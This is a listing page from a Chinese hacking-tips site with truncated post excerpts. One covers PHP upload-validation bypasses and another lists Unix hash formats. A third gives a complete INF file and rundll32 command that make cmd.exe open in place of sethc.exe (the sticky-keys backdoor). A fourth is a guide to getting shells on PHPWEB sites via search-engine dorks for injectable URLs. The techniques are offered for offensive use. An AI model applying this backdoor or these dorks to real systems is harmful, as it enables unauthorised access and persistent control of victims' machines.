记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

php代码审计基础

1.session本地浏览器中的变量,是可控的.PHP中还有一个变量$_session每个访问者的sessionID是不同的.这个值就用来区分每个用户.PHPSESSID=cmebf7jkflu5a31vf67kbiopk42.$_files 上传变量包含了:js验证,扩展名验证,MIME验证,目录验证js验证简单,不加载就可以了。扩展名验证, 如php,php3MIME验证, text/phpdemo: if (($_FILES['upfile']['type'] == 'image/gif') || ($_FILES['upfile']['type'] == 'image/jpeg')目录验证,利用iis6的特殊解析,这里主讲php,就不细说了。3数字型注射直接使用intval($_GET[id]),强制转
发布时间:2016-11-18 04:20 | 阅读:120848 | 评论:0 | 标签:Code MySQL PHP

几种常见的hash加密

—————*nix系————————系统:ES(Unix)例子: IvS7aeT4NzQPM说明:Linux或者其他linux内核系统中长度: 13 个字符描述:第1、2位为salt,例子中的’Iv’位salt,后面的为hash值 系统:MD5(Unix)例子:$1$12345678$XM4P3PrKBgKNnTaqG9P0T/说明:Linux或者其他linux内核系统中长度:34个字符描述:开始的$1$位为加密标志,后面8位12345678为加密使用的salt,后面的为hash加密算法:2000次循环调用MD5加密 系统:SHA-512(Unix)例子:$6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm说明:Linux或者其他linux内核系统中长度: 13 个
发布时间:2013-06-23 20:05 | 阅读:77896 | 评论:0 | 标签:Code 加密

inf文件劫持shift

Code:[Version]Signature=”$WINDOWS NT$”[DefaultInstall]AddReg=My_AddReg_Name[My_AddReg_Name]HKLM,SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution optionssethc.exe,debugger,0×00000000,c:windowssystem32cmd.exeCommand:rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:windowstempname.inf  
发布时间:2013-01-09 00:10 | 阅读:64483 | 评论:0 | 标签:3389 Code

PHPWEB注射拿shell

今天橘子大牛发了个phpweb的exp。已经是xday了。感觉拿shell还是比较给力的!网站后台:admin.php关键查找url:maq/classdown/htmlpage/newspage/guide注射点:baidu or Google : down/class/index.php?myord=1webmall/query.php?catid=webmall/query.php?typeid=webmall/queru.php?typeid=直接放萝卜去:网上已经有各种注入exp了。search.php构造注射,伪静态注射。不妨去试试!上传html脚本:<form name=”uploadForm” method=”post” enctype=”multipart/form-data” acti
发布时间:2013-01-08 01:10 | 阅读:335203 | 评论:0 | 标签:Code PHP

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云